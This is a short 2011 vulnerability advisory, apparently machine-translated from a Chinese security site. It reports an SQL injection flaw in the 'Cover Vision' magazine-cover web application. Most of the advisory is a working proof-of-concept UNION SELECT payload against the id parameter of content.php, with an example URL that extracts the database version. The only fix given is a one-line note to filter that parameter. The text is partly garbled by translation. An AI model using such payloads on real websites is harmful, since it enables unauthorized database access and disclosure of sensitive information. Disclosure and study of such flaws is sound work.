Cover Vision SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

2011-03-15T00:00:00
ID MYHACK58:62201129727
Type myhack58
Reporter 佚名
Modified 2011-03-15T00:00:00

Description

Cover Vision is a Can you convert photo to a magazine cover of a Web application, Cover Vision existSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ Exploit Title : Cover Vision [ Sql Injection Vulnerability] Author : Egyptian. H4x0rz Contact : SpY(at)Hotmail.Com Date : 13-03-2011 Software Link: http://unikscripts.com/yaxal_products.php?display=product&id=6 6 category: Web Apps [SQli] HomePage : www.Black-hat.cc

[+]poc: ~~~~~~~~~ SQL injection Vulnerability http://patch/content.php?id=1+union+select+1,2,3,4,[sqli],6,7,8,9,1 0,1 1,1 2,1 3

[#]eXample http://server/content.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,1 0,1 1,1 2,1 3

Fix: content. php filter ID parameter